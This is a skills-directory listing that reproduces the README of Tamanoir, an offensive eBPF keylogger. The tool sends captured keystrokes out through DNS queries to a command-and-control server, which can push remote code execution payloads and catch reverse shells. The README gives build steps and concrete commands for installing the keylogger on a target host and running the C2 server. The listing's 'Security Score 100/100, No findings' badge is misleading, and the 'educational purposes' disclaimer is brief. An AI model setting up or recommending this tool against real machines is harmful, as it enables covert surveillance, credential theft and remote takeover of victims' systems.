SkillAgentSearch skills...

Tamanoir

An eBPF🐝 Keylogger with C2-based RCE payload delivery

GenerateConvertImprove

Install / Use

/learn @adgaultier/Tamanoir
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

<div align="center"> <h1>Tamanoir</h1> <h3>An eBPF🐝 Keylogger with <br>C2-based RCE payload delivery</h3> <img src="https://github.com/user-attachments/assets/47b8a0ef-6a52-4e2d-8188-e77bb9e98d79" style="width: 30%; height: auto;"> <p><small><i>A large anteater of Central and South America, Myrmecophaga tridactyla</i></small></p> </div>

⚡ Powered by Aya, Tokio, Tonic and Ratatui

💡Overview

Tamanoir is structured around 3 components:

1. Tamanoir

An eBPF program running on a target host, it will act as a keylogger and extract keystrokes via DNS queries.<br> In DNS response, attacker can choose to send chunks of RCE payload that will be executed on targeted host.

2. Tamanoir-C2

The Command & Control server. It acts as a DNS proxy and can inject rce payloads in DNS response.<br> It also can handle reverse shell connections.

3. Tamanoir-tui

The TUI client communicating with C2 server. Built on top of ratatui

<div align="center"> <img src="https://github.com/user-attachments/assets/eb671b0a-9431-41b7-9d41-4a35f222a728" style="width: 100%; height: auto;"> <p><small><i>Tui client demo</i></small></p> </div>

Glossary

  • what is eBPF
  • C2: Command and Control
  • RCE: Remote Code Execution

Documentation

Jump to:

Architecture

<div align="center"> <img src="https://github.com/user-attachments/assets/725c9623-ae8e-4d7e-9210-0785d5f28d6e" style="width:75%"> </div>

🚀 Setup

You need a Linux based OS.

⚒️ Build from source

To build from source, make sure you have:

  • bpf-linker installed.
  • Rust installed with nightly toolchain.
  • protobuf-compiler

1. Build ebpf program

cd tamanoir-ebpf && cargo build --release

2. Build user space program

cargo build -p tamanoir --release

3. Build C2 Server

cargo build -p tamanoir-c2 --release

4. Build Ratatui Client

cargo build -p tamanoir-tui --release

These commands will produce tamanoir, tamanoir-c2 and tamanoir-tui executables in target/release that you can add to your$PATH

📥 Binary release

You can download the pre-built binaries from the release page

<br>

🪄 Usage

Tamanoir

🖥️ on target host:

RUST_LOG=info sudo -E tamanoir \
              --proxy-ip <C2 server IP> \
              --hijack-ip <locally configured DNS server IP> \
              --iface <network interface name>

for example:

RUST_LOG=info sudo -E tamanoir \
              --proxy-ip 192.168.1.15 \
              --hijack-ip 8.8.8.8 \
              --iface wlan0
<br>

C2 Server

🖥️ on your C2 server host:

sudo tamanoir-c2 start

[!NOTE] Make sure port 53 is available

<br>

Tui Client

🖥️ wherever you want to use the client:

tamanoir-tui -i  <C2 server IP>

[!NOTE] Make sure C2 server is reachable on port 50051

<br>

⚠️ Disclaimer

Tamanoir is developed for educational purposes only

<br>

✍️ Authors

Adrien Gaultier Badr Badri

<br>

⚖️ License

GPLv3

adgaultier

View profile

View on GitHub
GitHub Stars309
CategoryDevelopment
Updated15d ago
Forks26
adgaultier/tamanoir

Languages

Rust

Security Score

100/100

Audited on Mar 14, 2026

No findings